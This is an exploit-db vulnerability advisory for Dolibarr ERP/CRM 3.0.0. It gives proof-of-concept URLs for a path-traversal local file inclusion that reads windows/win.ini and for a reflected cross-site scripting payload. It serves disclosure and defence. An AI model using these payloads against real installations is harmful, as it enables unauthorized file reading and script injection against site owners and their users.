Dolibarr ERP/CRM 3.0.0 – Multiple Vulnerabilities

  • 作者: AutoSec Tools
    日期: 2011-04-22
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17202/
  • ------------------------------------------------------------------------
    Software................Dolibarr 3.0.0
    Vulnerability...........Local File Inclusion
    Threat Level............Critical (4/5)
    Download................http://www.dolibarr.org/
    Discovery Date..........4/21/2011
    Tested On...............Windows Vista + XAMPP
    ------------------------------------------------------------------------
    Author..................AutoSec Tools
    Site....................http://www.autosectools.com/
    Email...................John Leitch <john@autosectools.com>
    ------------------------------------------------------------------------
    
    
    --Description--
    
    A local file inclusion vulnerability in Dolibarr 3.0.0 can be
    exploited to include arbitrary files.
    
    
    --PoC--
    
    http://localhost/dolibarr-3.0.0/htdocs/user/passwordforgotten.php?theme=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
    
    ------------------------------------------------------------------------
    Software................Dolibarr 3.0.0
    Vulnerability...........Reflected Cross-site Scripting
    Threat Level............Low (1/5)
    Download................http://www.dolibarr.org/
    Discovery Date..........4/21/2011
    Tested On...............Windows Vista + XAMPP
    ------------------------------------------------------------------------
    Author..................AutoSec Tools
    Site....................http://www.autosectools.com/
    Email...................John Leitch <john@autosectools.com>
    ------------------------------------------------------------------------
    
    
    --Description--
    
    A reflected cross-site scripting vulnerability in Dolibarr 3.0.0 can
    be exploited to execute arbitrary JavaScript.
    
    
    --PoC--
    
    http://localhost/dolibarr-3.0.0/htdocs/document.php?lang=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E